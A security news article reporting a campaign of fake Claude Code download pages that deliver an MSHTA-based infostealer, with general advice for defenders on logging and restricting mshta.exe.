Cybercriminals have found a new way to target developers and IT professionals by setting up fake download pages that impersonate Claude Code, a legitimate AI coding assistant.
These deceptive pages trick users into downloading what appears to be an official installation package, but instead silently deploy an infostealer malware onto the victim’s system.
The use of a well-known AI tool as bait reflects a growing trend where threat actors exploit the popularity of artificial intelligence platforms to gain trust and bypass suspicion.
The attack was first observed through a distribution campaign using it
.com as the delivery domain.
Victims are lured to these sites, which are carefully designed to mimic the look and feel of legitimate software download portals.
Once a user clicks the download button, they are not getting any real software — instead, the site triggers a malicious execution chain that begins the moment the file is opened.
The convincing design of these fake pages gives users very little reason to question the file’s authenticity before it is too late.
Cybersecurity analyst Maurice Fielenbach noted the campaign and highlighted that the attack ends in a straightforward MSHTA-based infostealer.
He pointed out that mshta.exe, a legitimate Microsoft Windows binary, remains one of the most important processes for defenders to monitor, as it is frequently abused by attackers to run malicious HTML Application (HTA) files fetched directly from remote sources.
Fielenbach also stressed that monitoring HTA execution from remote sources is a high-signal indicator of real attacker activity.
The broader context of this campaign fits into a well-documented pattern where threat actors weaponize the growing trust people place in AI tools.
As AI-assisted coding platforms see wider adoption across developer communities, criminals find a larger pool of potential victims who may be less cautious when downloading what appears to be a legitimate productivity tool.
This is not the first time Claude-themed lures have been used — earlier campaigns exploited AI branding the same way, showing that this trend is far from isolated.
The impact of this infostealer can be severe for any affected user. Once the malware runs on a victim’s machine, it is capable of harvesting browser-stored credentials, session tokens, and other sensitive data before sending it to attacker-controlled infrastructure.
For developers who are the primary targets, the consequences extend well beyond personal data loss — compromised credentials can open doors to code repositories, cloud environments, and internal systems, potentially triggering much broader organizational security incidents.
MSHTA-Based Execution and LOLBin Abuse
The infection mechanism in this campaign centers on the abuse of mshta.exe, a signed Microsoft binary that is part of the core Windows operating system.
Since it is a trusted, system-native tool, many security products do not flag its activity by default, making it a low-profile vehicle for attackers.
This technique is known as Living off the Land and is cataloged under MITRE ATT&CK as T1218.005, which allows malware to execute without dropping a traditional executable file to disk, significantly reducing its overall detection footprint.
When a victim interacts with the fake download page, mshta.exe is invoked to fetch and run a remote HTA file that contains embedded malicious script.
This script carries out the infostealer’s core functions — collecting credentials, browser data, and other sensitive information — entirely within memory.
The use of remote HTA execution means the payload never physically lands on the system as a standalone file, making forensic recovery considerably more difficult for incident responders after an attack.
Security teams are strongly advised to enable detailed logging for mshta.exe activity across all endpoints and flag any instance where it connects to external URLs.
Organizations should also consider restricting mshta.exe execution through application control policies where their operational requirements allow it.
Users should always verify software downloads from official vendor sources and avoid downloading tools from third-party or unfamiliar websites, regardless of how genuine the page may appear.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Threat Actors Using Fake Claude Code Download to Deploy Infostealer appeared first on Cyber Security News.
